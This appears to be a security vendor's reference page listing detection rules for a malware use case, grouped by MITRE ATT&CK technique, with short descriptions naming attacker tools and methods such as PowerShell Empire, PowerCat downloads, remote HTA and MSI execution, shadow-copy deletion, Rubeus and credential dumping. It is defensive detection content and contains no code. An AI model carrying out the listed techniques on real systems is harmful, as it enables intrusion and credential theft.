Product: GitHub
Use-Case: Malware
Rules | Models | MITRE ATT&CK® TTPs | Activity Types | Parsers |
---|---|---|---|---|
164 | 25 | 76 | 3 | 6 |
Event Type | Rules | Models |
---|---|---|
app-login | T1078 - Valid Accounts ↳ Auth-Blacklist-Shost: User authentication or login from a known blacklisted IP | |
authentication-successful | T1078 - Valid Accounts ↳ Auth-Blacklist-Shost: User authentication or login from a known blacklisted IP | |
process-created

Rules (grouped by MITRE ATT&CK TTP; a rule is listed under every technique it is mapped to):

T1059 - Command and Scripting Interpreter
↳ EPA-PU-PS-F: First execution of powershell process for user
↳ EPA-PU-PS-A: Abnormal execution of powershell process for user
↳ EPA-PG-PS-F: First execution of powershell process for this peer group
↳ EPA-PG-PS-A: Abnormal execution of powershell process for this peer group
↳ Powershell-Advanced-A: Abnormal user using advanced powershell capabilities
↳ Powershell-Commands-F: First new Powershell command
↳ Powershell-Commands-A: Abnormal Powershell command
↳ Powershell-Script-F: First time this powershell script has been run
↳ Powershell-RunType-A: Abnormal invocation of powershell
↳ Powershell-WMI-F: First time for user using powershell WMI
↳ Powershell-WMI-A: Abnormal user using powershell WMI
↳ Powershell-Empire: The attacker tool PowerShell Empire has been used
↳ WMIExec-VBS-Script: Suspicious usage of wscript/cscript
↳ FE-WC: Modified WMIPRVSE by FireEye for pentesting
↳ PC-PowerShell-SocketCreate: TCP socket created through Powershell.
↳ PC-PowerShell-ExchangeSnapIns: Exchange Snap-In was imported and run by Powershell.
↳ PC-PowerShell-PowerCatDownload: PowerCat tool was downloaded via Powershell.
↳ PC-Powershell-HafniumActivity: Powershell HAFNIUM activity
↳ PowerShell-Invoke-WebRequest: Powershell run with Invoke-WebRequest.
↳ Powershell-ExecPolicy-Bypass-F: First use of powershell with '-ExecutionPolicy Bypass' by the user
↳ Powershell-ExecPolicy-Bypass-A: Abnormal user using powershell with '-ExecutionPolicy Bypass'
↳ A-Suspicious-Persistence: Suspicious 'schtasks' creation, possible attack tool usage on this asset
↳ A-DLL-ULOAD-EquationGroup: A known 'Equation Group' artifact was observed on this asset
↳ A-TrojanLoader: Possible Trojan Loader activity on this asset
↳ A-ZxShell: Known backdoor software, ZxShell, possibly loaded on this asset
↳ A-Archer: 'Archer' malware executed on this asset
↳ A-Hanword-Subprocess: Suspicious processes spawned by the Hangul word processor on this asset
↳ A-Outlook-Unsafe-Execution: A suspicious sub-process was spawned by Microsoft Outlook on this asset
↳ A-TurlaGroup-LateralMovement: Artifacts from the APT 'Turla Group' have been observed on this asset
↳ A-Sus-Powershell-Invocation-Parent-Proc: Suspicious Powershell invocation from interpreters or unusual parent programs on this asset.
↳ A-Sus-Encoded-PS-CmdLine: Suspicious Powershell process was started with base64-encoded commands on this asset.
↳ A-Base64-Powershell-CmdLine-Keywords: Base64-encoded strings were found in hidden malicious Powershell command lines on this asset.
↳ A-Baby-Shark-Activity: Activity related to Baby Shark malware has been found on this asset.
↳ A-Non-Interactive-Powershell: Non-interactive Powershell activity was found on this asset.
↳ A-Powershell-Script-AppData: Powershell was invoked with a suspicious command line referencing an AppData folder on this asset.
↳ A-Dtrack: Known banking malware, Dtrack, observed on this asset
↳ A-Suspicious-DAT: A suspicious .dat file was used, possible APT activity on this asset
↳ A-Operation-Wocao-Activity: Possible Operation Wocao APT activity on this asset, suspicious command line arguments
↳ A-Koadic-Tool-Usage: 'Koadic' attacker tool usage on this asset
↳ A-WScript-CScript-Dropper: Wscript or Cscript used for script execution from user directories on this asset
↳ A-Mshta-Javascript: Mshta.exe has executed a JavaScript-related command on this asset
↳ A-Mshta-CMD-Spawn: Mshta.exe has executed a command line executable on this asset
↳ A-Suspicious-Shell-Child-Process: Windows shell has spawned a suspicious process on this asset
↳ A-WMI-Spawn-PowerShell: PowerShell was spawned via WMI on this asset.
↳ A-Powershell-CMDLETS: Malicious PowerShell script was used via the Get-* cmdlets of PowerShell on this asset
↳ A-PowerShell-BITS-Job: BITS job was created via PowerShell on this asset.
↳ A-Mustang-Panda-Dropper: Possible Mustang Panda dropper execution on this asset.
↳ A-Mshta-Script: Mshta.exe .NET code execution on this asset.
↳ A-EPA-Powershell-Invoke-WebRequest-F: First execution of a powershell process with Invoke-WebRequest for the asset in the organization.
↳ A-EPA-Powershell-Invoke-WebRequest-A: Abnormal execution of a powershell process with Invoke-WebRequest for the asset in the organization.
↳ EPA-Powershell-Invoke-WebRequest-Domain-F: First execution of a powershell process with Invoke-WebRequest to this domain for the asset in the organization.
↳ EPA-Powershell-Invoke-WebRequest-Domain-A: Abnormal execution of a powershell process with Invoke-WebRequest to this domain for the asset in the organization.

T1059.001 - Command and Scripting Interpreter: PowerShell
↳ EPA-PU-PS-F: First execution of powershell process for user
↳ EPA-PU-PS-A: Abnormal execution of powershell process for user
↳ EPA-PG-PS-F: First execution of powershell process for this peer group
↳ EPA-PG-PS-A: Abnormal execution of powershell process for this peer group
↳ Powershell-Advanced-A: Abnormal user using advanced powershell capabilities
↳ Powershell-Commands-F: First new Powershell command
↳ Powershell-Commands-A: Abnormal Powershell command
↳ Powershell-Script-F: First time this powershell script has been run
↳ Powershell-RunType-A: Abnormal invocation of powershell
↳ Powershell-WMI-F: First time for user using powershell WMI
↳ Powershell-WMI-A: Abnormal user using powershell WMI
↳ Powershell-Empire: The attacker tool PowerShell Empire has been used
↳ PC-PowerShell-SocketCreate: TCP socket created through Powershell.
↳ PC-PowerShell-ExchangeSnapIns: Exchange Snap-In was imported and run by Powershell.
↳ PC-PowerShell-PowerCatDownload: PowerCat tool was downloaded via Powershell.
↳ PC-Powershell-HafniumActivity: Powershell HAFNIUM activity
↳ PowerShell-Invoke-WebRequest: Powershell run with Invoke-WebRequest.
↳ Powershell-ExecPolicy-Bypass-F: First use of powershell with '-ExecutionPolicy Bypass' by the user
↳ Powershell-ExecPolicy-Bypass-A: Abnormal user using powershell with '-ExecutionPolicy Bypass'
↳ A-Suspicious-Persistence: Suspicious 'schtasks' creation, possible attack tool usage on this asset
↳ A-Sus-Powershell-Invocation-Parent-Proc: Suspicious Powershell invocation from interpreters or unusual parent programs on this asset.
↳ A-Sus-Encoded-PS-CmdLine: Suspicious Powershell process was started with base64-encoded commands on this asset.
↳ A-Base64-Powershell-CmdLine-Keywords: Base64-encoded strings were found in hidden malicious Powershell command lines on this asset.
↳ A-Baby-Shark-Activity: Activity related to Baby Shark malware has been found on this asset.
↳ A-Non-Interactive-Powershell: Non-interactive Powershell activity was found on this asset.
↳ A-Powershell-Script-AppData: Powershell was invoked with a suspicious command line referencing an AppData folder on this asset.
↳ A-Operation-Wocao-Activity: Possible Operation Wocao APT activity on this asset, suspicious command line arguments
↳ A-Mshta-CMD-Spawn: Mshta.exe has executed a command line executable on this asset
↳ A-Suspicious-Shell-Child-Process: Windows shell has spawned a suspicious process on this asset
↳ A-WMI-Spawn-PowerShell: PowerShell was spawned via WMI on this asset.
↳ A-Powershell-CMDLETS: Malicious PowerShell script was used via the Get-* cmdlets of PowerShell on this asset
↳ A-PowerShell-BITS-Job: BITS job was created via PowerShell on this asset.
↳ A-EPA-Powershell-Invoke-WebRequest-F: First execution of a powershell process with Invoke-WebRequest for the asset in the organization.
↳ A-EPA-Powershell-Invoke-WebRequest-A: Abnormal execution of a powershell process with Invoke-WebRequest for the asset in the organization.
↳ EPA-Powershell-Invoke-WebRequest-Domain-F: First execution of a powershell process with Invoke-WebRequest to this domain for the asset in the organization.
↳ EPA-Powershell-Invoke-WebRequest-Domain-A: Abnormal execution of a powershell process with Invoke-WebRequest to this domain for the asset in the organization.

T1218 - Signed Binary Proxy Execution
↳ PC-ParentName-ProcessName-DotNET-A: Abnormal child process creation for .NET-associated process
↳ A-CSC-Suspicious-Parent-Process: Suspicious parent process for csc.exe, possible payload delivery on this asset
↳ A-MsiExec-Web-Install: A suspicious msiexec process was started with a web address as a parameter on this asset.
↳ A-DLL-ULOAD-EquationGroup: A known 'Equation Group' artifact was observed on this asset
↳ A-TrojanLoader: Possible Trojan Loader activity on this asset
↳ A-ZxShell: Known backdoor software, ZxShell, possibly loaded on this asset
↳ A-Archer: 'Archer' malware executed on this asset
↳ A-Baby-Shark-Activity: Activity related to Baby Shark malware has been found on this asset.
↳ A-Empire-Monkey: EmpireMonkey APT activity was found on this asset.
↳ A-Suspicious-ControlPanel: Control Panel items loaded from outside the default directory on this asset
↳ A-Devtoolslauncher-Binary: Devtoolslauncher.exe has executed a binary on this asset
↳ A-HH-EXE-CHM: HH.exe usage, possible code execution on this asset
↳ A-MSHTA-SVCHOST: Mshta.exe spawned by svchost.exe, possible lateral movement on this asset
↳ A-Mshta-Javascript: Mshta.exe has executed a JavaScript-related command on this asset
↳ A-Mshta-CMD-Spawn: Mshta.exe has executed a command line executable on this asset
↳ A-Suspicious-Shell-Child-Process: Windows shell has spawned a suspicious process on this asset
↳ A-OpenWith-Exec-Cmd: OpenWith.exe executed via command line on this asset.
↳ A-Ordinal-Rundll32-Call: Suspicious calls of DLL exports by ordinal via rundll32 on this asset.
↳ A-Regsvr32-Suspicious-Cmd: Suspicious command line arguments related to regsvr32.exe have been observed on this asset.
↳ A-CDB-App-Whitelisting: 64-bit shellcode was launched using cdb.exe on this asset.
↳ A-PC-Mshta-Hta-F: First time .hta file usage by Mshta.exe on this asset.
↳ A-PC-Mshta-Hta-A: Abnormal .hta file usage by Mshta.exe on this asset.
↳ A-PC-Regsvr32-sct-F: First time .sct file usage by Regsvr32.exe on this asset.
↳ A-PC-Regsvr32-sct-A: Abnormal .sct file usage by Regsvr32.exe on this asset.
↳ A-PC-InstallUtil-exe-F: First time .exe file usage by InstallUtil.exe on this asset.
↳ A-PC-InstallUtil-exe-A: Abnormal .exe file usage by InstallUtil.exe on this asset.
↳ A-PC-InstallUtil-dll-F: First time .dll file usage by InstallUtil.exe on this asset.
↳ A-PC-InstallUtil-dll-A: Abnormal .dll file usage by InstallUtil.exe on this asset.
↳ A-DotNET-URL: .NET command line contains a remote file on this asset.
↳ A-Mshta-Script: Mshta.exe .NET code execution on this asset.
↳ A-BinExec-MSI-Remote: 'Msiexec.exe' used to execute a remote '.msi' file on this host
↳ A-BinExec-HTA-Remote: 'Mshta.exe' used to execute a remote '.hta' file on this host
↳ A-BinExec-Odbcconf: 'Odbcconf.exe' used to execute a DLL on this host

T1218.008 - Signed Binary Proxy Execution: Odbcconf
↳ A-BinExec-Odbcconf: 'Odbcconf.exe' used to execute a DLL on this host

T1218.005 - Signed Binary Proxy Execution: Mshta
↳ PC-ParentName-ProcessName-DotNET-A: Abnormal child process creation for .NET-associated process
↳ A-CSC-Suspicious-Parent-Process: Suspicious parent process for csc.exe, possible payload delivery on this asset
↳ A-Baby-Shark-Activity: Activity related to Baby Shark malware has been found on this asset.
↳ A-MSHTA-SVCHOST: Mshta.exe spawned by svchost.exe, possible lateral movement on this asset
↳ A-Mshta-Javascript: Mshta.exe has executed a JavaScript-related command on this asset
↳ A-Mshta-CMD-Spawn: Mshta.exe has executed a command line executable on this asset
↳ A-Suspicious-Shell-Child-Process: Windows shell has spawned a suspicious process on this asset
↳ A-PC-Mshta-Hta-F: First time .hta file usage by Mshta.exe on this asset.
↳ A-PC-Mshta-Hta-A: Abnormal .hta file usage by Mshta.exe on this asset.
↳ A-DotNET-URL: .NET command line contains a remote file on this asset.
↳ A-Mshta-Script: Mshta.exe .NET code execution on this asset.
↳ A-BinExec-HTA-Remote: 'Mshta.exe' used to execute a remote '.hta' file on this host

T1218.007 - Signed Binary Proxy Execution: Msiexec
↳ A-MsiExec-Web-Install: A suspicious msiexec process was started with a web address as a parameter on this asset.
↳ A-BinExec-MSI-Remote: 'Msiexec.exe' used to execute a remote '.msi' file on this host

T1053 - Scheduled Task/Job
↳ ChaferAPT-Activity: Chafer APT related activity observed
↳ EPA-UP-CrontabMod-F: First execution of a process whose command modifies crontab, for user.
↳ EPA-UP-CrontabMod-A: Abnormal execution of a process whose command modifies crontab, for user.
↳ A-Suspicious-Persistence: Suspicious 'schtasks' creation, possible attack tool usage on this asset
↳ A-New-ScheduledTask: New scheduled task created using schtasks.exe on this asset
↳ A-Defrag-Deactivation: Scheduled defragmentation task was deactivated on this asset.
↳ A-EPA-HP-CrontabMod-F: First execution of a process on this asset whose command modifies crontab
↳ A-EPA-HP-CrontabMod-A: Abnormal execution of a process on this asset whose command modifies crontab

T1053.003 - Scheduled Task/Job: Cron
↳ EPA-UP-CrontabMod-F: First execution of a process whose command modifies crontab, for user.
↳ EPA-UP-CrontabMod-A: Abnormal execution of a process whose command modifies crontab, for user.
↳ A-EPA-HP-CrontabMod-F: First execution of a process on this asset whose command modifies crontab
↳ A-EPA-HP-CrontabMod-A: Abnormal execution of a process on this asset whose command modifies crontab

TA0002 - Execution
↳ EPA-UP-A: Abnormal execution of process for user
↳ EPA-GP-F: First execution of process for this peer group
↳ EPA-GP-A: Abnormal execution of process for this peer group
↳ EPA-PDir-F: First execution of a process in this directory for the organization
↳ EPA-HDir-Server-F: First execution of a process in this directory on a server
↳ EPA-PH-F: First execution of process (vssadmin.exe) on host
↳ EPA-F-CLI: Suspicious Windows process executed
↳ EPA-UH-Pen-F: Known pentest tool used
↳ SW-UC: Unusual child process loaded by SolarWinds tool
↳ ParentProcess-P-F: First execution of this parent process for peer group.
↳ ParentProcess-P-A: Abnormal parent process for peer group
↳ EPA-UP-Commands-F: First execution of this process for user where the command is curl/wget
↳ EPA-UP-Commands-A: Abnormal process execution containing wget or curl commands for the user.
↳ A-EPA-HP-F: First execution of process on asset
↳ A-EPA-HP-A: Abnormal execution of process on asset
↳ A-EPA-ZP-A: Abnormal execution of process for the asset in this zone
↳ A-EPA-ZP-F: First execution of process for the asset in this zone
↳ A-EPA-OP-F: First execution of process for the asset in this organization
↳ A-EPA-OP-A: Abnormal execution of process for the asset in this organization
↳ A-EPA-HPP-F: First parent-process combination on asset
↳ A-EPA-HPP-A: Abnormal parent-process combination on asset
↳ A-EPA-OPP-F: First parent-process combination in this organization
↳ A-EPA-OPP-A: Abnormal parent-process combination in this organization
↳ A-EPA-TEMP-DIRECTORY-F: First execution of this process from a temporary directory on this asset
↳ A-EPA-TEMP-DIRECTORY-A: Abnormal execution of this process from a temporary directory
↳ A-Emotet: A process associated with the Emotet malware has been executed on this asset
↳ A-Qbot: Artifacts related to Qbot banking malware have been observed on this asset
↳ A-TropicTrooper-APT: Possible TropicTrooper APT artifacts observed on this asset
↳ A-EPA-HP-Commands-F: First execution of process on asset where the command is curl/wget
↳ A-EPA-HP-Commands-A: Abnormal execution of process on asset where the command is curl/wget

T1562 - Impair Defenses
↳ A-Java-Remote-Dubugging: Java executed with remote debugging enabled on this asset
↳ A-KnownFirewallDisable-Log4j: Firewall-disable arguments via command line were detected on this asset.

T1562.004 - Impair Defenses: Disable or Modify System Firewall
↳ A-KnownFirewallDisable-Log4j: Firewall-disable arguments via command line were detected on this asset.

T1190 - Exploit Public-Facing Application
↳ A-EPA-Log4j-String-Command-2: An attempt via process creation to exploit the CVE-2021-44228 vulnerability using known keywords was observed on this asset.

T1059.005 - Command and Scripting Interpreter: Visual Basic
↳ WMIExec-VBS-Script: Suspicious usage of wscript/cscript
↳ A-WScript-CScript-Dropper: Wscript or Cscript used for script execution from user directories on this asset
↳ A-Suspicious-Shell-Child-Process: Windows shell has spawned a suspicious process on this asset
↳ A-Mshta-Script: Mshta.exe .NET code execution on this asset.

T1059.007 - Command and Scripting Interpreter: JavaScript
↳ A-WScript-CScript-Dropper: Wscript or Cscript used for script execution from user directories on this asset
↳ A-Mshta-Javascript: Mshta.exe has executed a JavaScript-related command on this asset
↳ A-Mshta-Script: Mshta.exe .NET code execution on this asset.

T1047 - Windows Management Instrumentation
↳ Powershell-WMI-F: First time for user using powershell WMI
↳ Powershell-WMI-A: Abnormal user using powershell WMI
↳ PC-ParentName-ProcessName-DotNET-A: Abnormal child process creation for .NET-associated process
↳ A-Squibly-Two: A WMI SquiblyTwo attack, with possibly renamed WMI binary identified by imphash, was detected on this asset.
↳ A-DotNET-URL: .NET command line contains a remote file on this asset.

T1127 - Trusted Developer Utilities Proxy Execution
↳ PC-ParentName-ProcessName-DotNET-A: Abnormal child process creation for .NET-associated process
↳ A-CSharp-Interactive-Console: Execution of the C# interactive console by PowerShell on this asset.
↳ A-Microsoft-Workflow-Compiler: Microsoft Workflow Compiler was invoked on this asset.
↳ A-CDB-App-Whitelisting: 64-bit shellcode was launched using cdb.exe on this asset.
↳ A-PC-MSBuild-xml-F: First time .xml file usage by MSBuild.exe on this asset.
↳ A-PC-MSBuild-Csproj-F: First time .csproj file usage by MSBuild.exe on this asset.
↳ A-DotNET-URL: .NET command line contains a remote file on this asset.

T1127.001 - Trusted Developer Utilities Proxy Execution: MSBuild
↳ PC-ParentName-ProcessName-DotNET-A: Abnormal child process creation for .NET-associated process
↳ A-PC-MSBuild-xml-F: First time .xml file usage by MSBuild.exe on this asset.
↳ A-PC-MSBuild-Csproj-F: First time .csproj file usage by MSBuild.exe on this asset.
↳ A-DotNET-URL: .NET command line contains a remote file on this asset.

T1218.001 - Signed Binary Proxy Execution: Compiled HTML File
↳ A-HH-EXE-CHM: HH.exe usage, possible code execution on this asset
↳ A-DotNET-URL: .NET command line contains a remote file on this asset.

T1218.004 - Signed Binary Proxy Execution: InstallUtil
↳ PC-ParentName-ProcessName-DotNET-A: Abnormal child process creation for .NET-associated process
↳ A-PC-InstallUtil-exe-F: First time .exe file usage by InstallUtil.exe on this asset.
↳ A-PC-InstallUtil-exe-A: Abnormal .exe file usage by InstallUtil.exe on this asset.
↳ A-PC-InstallUtil-dll-F: First time .dll file usage by InstallUtil.exe on this asset.
↳ A-PC-InstallUtil-dll-A: Abnormal .dll file usage by InstallUtil.exe on this asset.
↳ A-DotNET-URL: .NET command line contains a remote file on this asset.

T1218.010 - Signed Binary Proxy Execution: Regsvr32
↳ PC-ParentName-ProcessName-DotNET-A: Abnormal child process creation for .NET-associated process
↳ A-Empire-Monkey: EmpireMonkey APT activity was found on this asset.
↳ A-Regsvr32-Suspicious-Cmd: Suspicious command line arguments related to regsvr32.exe have been observed on this asset.
↳ A-PC-Regsvr32-sct-F: First time .sct file usage by Regsvr32.exe on this asset.
↳ A-PC-Regsvr32-sct-A: Abnormal .sct file usage by Regsvr32.exe on this asset.

T1574 - Hijack Execution Flow
↳ DLL-SideLoading: DLL side-loading malware used, known artifact of APT27
↳ A-Winnti-Malware: Artifacts of 'Winnti' malware have been observed on this asset
↳ A-PlugX-DLL-Sideloading: DLL loaded from a suspicious location on this asset, typically seen with the PlugX malware family
↳ A-ServiceName-ServiceCmdline-F: First time this binary command line was seen for this service on this asset.
↳ A-ServiceName-ServiceCmdline-A: Abnormal binary command line for this service

T1574.010 - Hijack Execution Flow: Services File Permissions Weakness
↳ A-ServiceName-ServiceCmdline-F: First time this binary command line was seen for this service on this asset.
↳ A-ServiceName-ServiceCmdline-A: Abnormal binary command line for this service

T1574.011 - Hijack Execution Flow: Services Registry Permissions Weakness
↳ A-ServiceName-ServiceCmdline-F: First time this binary command line was seen for this service on this asset.
↳ A-ServiceName-ServiceCmdline-A: Abnormal binary command line for this service

T1203 - Exploitation for Client Execution
↳ A-Word-FLTLDR-Exploit-Vector: Possible loading of an exploit using Microsoft Office and the fltldr.exe application on this asset
↳ A-Hanword-Subprocess: Suspicious processes spawned by the Hangul word processor on this asset
↳ A-WinWord-Uncommon-Subprocess: Winword has spawned an uncommon subprocess, csc.exe, on this asset
↳ A-PC-ParentName-UMWorkerProcess-F: First time child process creation for the Exchange Unified Messaging service UMWorkerProcess.exe

T1505 - Server Software Component
↳ A-WebShell-CLI: Possible command line web shell detected on this asset
↳ A-WebShell-WebServer: Possible web server web shell detected on this asset
↳ A-Suspicious-IIS-Modules: Native-code modules for IIS installed via command line on this asset
↳ A-PC-ParentName-W3WP-F: First time child process creation for the Exchange web front-end process w3wp.exe

T1505.003 - Server Software Component: Web Shell
↳ A-WebShell-CLI: Possible command line web shell detected on this asset
↳ A-WebShell-WebServer: Possible web server web shell detected on this asset
↳ A-Suspicious-IIS-Modules: Native-code modules for IIS installed via command line on this asset
↳ A-PC-ParentName-W3WP-F: First time child process creation for the Exchange web front-end process w3wp.exe

T1059.003 - Command and Scripting Interpreter: Windows Command Shell
↳ FE-WC: Modified WMIPRVSE by FireEye for pentesting
↳ A-DLL-ULOAD-EquationGroup: A known 'Equation Group' artifact was observed on this asset
↳ A-TrojanLoader: Possible Trojan Loader activity on this asset
↳ A-ZxShell: Known backdoor software, ZxShell, possibly loaded on this asset
↳ A-Archer: 'Archer' malware executed on this asset
↳ A-Hanword-Subprocess: Suspicious processes spawned by the Hangul word processor on this asset
↳ A-Baby-Shark-Activity: Activity related to Baby Shark malware has been found on this asset.
↳ A-Operation-Wocao-Activity: Possible Operation Wocao APT activity on this asset, suspicious command line arguments
↳ A-Koadic-Tool-Usage: 'Koadic' attacker tool usage on this asset
↳ A-Mshta-CMD-Spawn: Mshta.exe has executed a command line executable on this asset
↳ A-Mustang-Panda-Dropper: Possible Mustang Panda dropper execution on this asset.

T1055 - Process Injection
↳ A-Zoho-DCTask: Dctask64.exe executed, possible process injection on this asset
↳ A-Svchost-Suspicious-Launch: Svchost.exe has launched without any command line arguments on this asset
↳ A-Formbook: Possible Formbook usage on this asset

T1197 - BITS Jobs
↳ A-PowerShell-BITS-Job: BITS job was created via PowerShell on this asset.
↳ A-Bitsadmin-Download: Bitsadmin was used to download a file on this asset.

T1546 - Event Triggered Execution
↳ FE-WC: Modified WMIPRVSE by FireEye for pentesting
↳ WMI-Script-Event-Consumers: Suspicious usage of WMI script event consumers.
↳ A-Shim-Installation: Possible installation of a 'shim' using sdbinst.exe on this asset
↳ A-FileType-Association-Change: File association changed for this file extension on this asset
↳ A-WMI-Spawn-PowerShell: PowerShell was spawned via WMI on this asset.

T1546.003 - Event Triggered Execution: Windows Management Instrumentation Event Subscription
↳ FE-WC: Modified WMIPRVSE by FireEye for pentesting
↳ WMI-Script-Event-Consumers: Suspicious usage of WMI script event consumers.
↳ A-WMI-Spawn-PowerShell: PowerShell was spawned via WMI on this asset.

T1218.011 - Signed Binary Proxy Execution: Rundll32
↳ A-DLL-ULOAD-EquationGroup: A known 'Equation Group' artifact was observed on this asset
↳ A-TrojanLoader: Possible Trojan Loader activity on this asset
↳ A-ZxShell: Known backdoor software, ZxShell, possibly loaded on this asset
↳ A-Archer: 'Archer' malware executed on this asset
↳ A-Suspicious-Shell-Child-Process: Windows shell has spawned a suspicious process on this asset
↳ A-Ordinal-Rundll32-Call: Suspicious calls of DLL exports by ordinal via rundll32 on this asset.

T1563 - Remote Service Session Hijacking
↳ A-MSTSC-RDP-Hijack: MSTSC shadowing, possible RDP session hijack/shadowing on this asset

T1563.002 - Remote Service Session Hijacking: RDP Hijacking
↳ A-MSTSC-RDP-Hijack: MSTSC shadowing, possible RDP session hijack/shadowing on this asset

T1012 - Query Registry
↳ A-Baby-Shark-Activity: Activity related to Baby Shark malware has been found on this asset.
↳ A-Operation-Wocao-Activity: Possible Operation Wocao APT activity on this asset, suspicious command line arguments

T1027 - Obfuscated Files or Information
↳ A-CSC-Suspicious-Parent-Process: Suspicious parent process for csc.exe, possible payload delivery on this asset
↳ A-CSC-Suspicious-Folder: Csc.exe spawned from a suspicious folder on this asset
↳ A-Sus-Encoded-PS-CmdLine: Suspicious Powershell process was started with base64-encoded commands on this asset.
↳ A-Base64-Powershell-CmdLine-Keywords: Base64-encoded strings were found in hidden malicious Powershell command lines on this asset.
↳ A-Operation-Wocao-Activity: Possible Operation Wocao APT activity on this asset, suspicious command line arguments

T1036 - Masquerading
↳ A-Executable-Suspicious-Folder: A process has been run from a binary located in a suspicious folder on this asset
↳ A-Sus-Double-Extension: An .exe extension was used after a different, non-executable file extension on this asset.
↳ A-Operation-Wocao-Activity: Possible Operation Wocao APT activity on this asset, suspicious command line arguments

T1036.004 - Masquerading: Masquerade Task or Service
↳ A-Operation-Wocao-Activity: Possible Operation Wocao APT activity on this asset, suspicious command line arguments

T1482 - Domain Trust Discovery
↳ A-Trickbot-Recon: Trickbot malware domain reconnaissance activity on this asset

T1204 - User Execution
↳ A-CMD-Spawn-From-Office: A command line executable was spawned from an Office application on this asset
↳ A-UserProcess-Spawned-FromOffice: An executable running under the 'Users' path has been spawned from an Office application on this asset
↳ A-WinWord-Uncommon-Subprocess: Winword has spawned an uncommon subprocess, csc.exe, on this asset

T1204.002 - User Execution: Malicious File
↳ A-CMD-Spawn-From-Office: A command line executable was spawned from an Office application on this asset
↳ A-UserProcess-Spawned-FromOffice: An executable running under the 'Users' path has been spawned from an Office application on this asset
↳ A-WinWord-Uncommon-Subprocess: Winword has spawned an uncommon subprocess, csc.exe, on this asset

T1218.002 - Signed Binary Proxy Execution: Control Panel
↳ A-Suspicious-ControlPanel: Control Panel items loaded from outside the default directory on this asset

T1546.001 - Event Triggered Execution: Change Default File Association
↳ A-FileType-Association-Change: File association changed for this file extension on this asset

T1113 - Screen Capture
↳ A-PSR-Screenshot: Psr.exe was used to take a screenshot on this asset

T1547 - Boot or Logon Autostart Execution
↳ DLL-SideLoading: DLL side-loading malware used, known artifact of APT27
↳ A-AutoRun-Modification: AutoRun keys modified using reg.exe on this asset

T1547.001 - Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder
↳ A-AutoRun-Modification: AutoRun keys modified using reg.exe on this asset

T1123 - Audio Capture
↳ A-Powershell-AudioCapture: Powershell has recorded external audio on this asset
↳ A-SoundRecorder-AudioCapture: SoundRecorder has recorded external audio on this asset

T1543 - Create or Modify System Process
↳ EPA-SERVICE-PARAMS: Suspicious parameters found in process for service creation
↳ A-EPA-USF-F: First process per service name for asset
↳ A-ServicePath-Modification: Suspicious service path identified on this asset

T1543.003 - Create or Modify System Process: Windows Service
↳ EPA-SERVICE-PARAMS: Suspicious parameters found in process for service creation
↳ A-EPA-USF-F: First process per service name for asset
↳ A-ServicePath-Modification: Suspicious service path identified on this asset

T1105 - Ingress Tool Transfer
↳ A-MsiExec-Web-Install: A suspicious msiexec process was started with a web address as a parameter on this asset.
↳ A-Office-Payload-Download: Possible malicious payload download via Microsoft Office binaries on this asset

T1546.011 - Event Triggered Execution: Application Shimming
↳ A-Shim-Installation: Possible installation of a 'shim' using sdbinst.exe on this asset

T1490 - Inhibit System Recovery
↳ EPA-EXPERT-SHADOW-COPIES: A suspicious command that deletes shadow copies has been executed for process
↳ EPA-EXPERT-DISABLE-RECOVERY: A suspicious command that disables recovery mode has been executed for process
↳ A-Mod-Boot-Config: Boot configuration data was deleted using the bcdedit command on this asset.

T1210 - Exploitation of Remote Services
↳ A-SIGRed: Possible SIGRed (CVE-2020-1350) exploitation on this asset

T1569 - System Services
↳ A-SIGRed: Possible SIGRed (CVE-2020-1350) exploitation on this asset

T1021 - Remote Services
↳ A-TurlaGroup-LateralMovement: Artifacts from the APT 'Turla Group' have been observed on this asset

T1021.002 - Remote Services: SMB/Windows Admin Shares
↳ A-TurlaGroup-LateralMovement: Artifacts from the APT 'Turla Group' have been observed on this asset

T1083 - File and Directory Discovery
↳ A-TurlaGroup-LateralMovement: Artifacts from the APT 'Turla Group' have been observed on this asset

T1135 - Network Share Discovery
↳ A-TurlaGroup-LateralMovement: Artifacts from the APT 'Turla Group' have been observed on this asset

T1202 - Indirect Command Execution
↳ A-UserProcess-Spawned-FromOffice: An executable running under the 'Users' path has been spawned from an Office application on this asset
↳ A-Outlook-Unsafe-Execution: A suspicious sub-process was spawned by Microsoft Outlook on this asset

T1055.001 - Process Injection: Dynamic-link Library Injection
↳ A-Zoho-DCTask: Dctask64.exe executed, possible process injection on this asset

T1027.004 - Obfuscated Files or Information: Compile After Delivery
↳ A-CSC-Suspicious-Parent-Process: Suspicious parent process for csc.exe, possible payload delivery on this asset
↳ A-CSC-Suspicious-Folder: Csc.exe spawned from a suspicious folder on this asset

T1574.002 - Hijack Execution Flow: DLL Side-Loading
↳ A-Winnti-Malware: Artifacts of 'Winnti' malware have been observed on this asset
↳ A-PlugX-DLL-Sideloading: DLL loaded from a suspicious location on this asset, typically seen with the PlugX malware family

T1555 - Credentials from Password Stores
↳ A-SecX-Tool-Exec: SecurityXploded tool execution detected on this asset

T1003 - OS Credential Dumping
↳ ATP-PWDump: A malicious executable that is part of a credential dumping tool was run
↳ A-Rubeus-CMD-Tool: Command line parameters used by the Rubeus hack tool detected on this asset

T1550 - Use Alternate Authentication Material
↳ A-Rubeus-CMD-Tool: Command line parameters used by the Rubeus hack tool detected on this asset

T1550.003 - Use Alternate Authentication Material: Pass the Ticket
↳ A-Rubeus-CMD-Tool: Command line parameters used by the Rubeus hack tool detected on this asset

T1558 - Steal or Forge Kerberos Tickets
↳ A-Rubeus-CMD-Tool: Command line parameters used by the Rubeus hack tool detected on this asset

T1558.003 - Steal or Forge Kerberos Tickets: Kerberoasting
↳ A-Rubeus-CMD-Tool: Command line parameters used by the Rubeus hack tool detected on this asset

T1053.005 - Scheduled Task/Job: Scheduled Task
↳ A-Suspicious-Persistence: Suspicious 'schtasks' creation, possible attack tool usage on this asset
↳ A-New-ScheduledTask: New scheduled task created using schtasks.exe on this asset

T1134 - Access Token Manipulation
↳ A-Suspicious-GetSystem-Usage: Possible Meterpreter/Cobalt Strike usage of GetSystem on this asset

T1134.001 - Access Token Manipulation: Token Impersonation/Theft
↳ A-Suspicious-GetSystem-Usage: Possible Meterpreter/Cobalt Strike usage of GetSystem on this asset

T1134.002 - Access Token Manipulation: Create Process with Token
↳ A-Suspicious-GetSystem-Usage: Possible Meterpreter/Cobalt Strike usage of GetSystem on this asset

T1003.002 - OS Credential Dumping: Security Account Manager
↳ ATP-PWDump: A malicious executable that is part of a credential dumping tool was run

T1547.002 - Boot or Logon Autostart Execution: Authentication Package
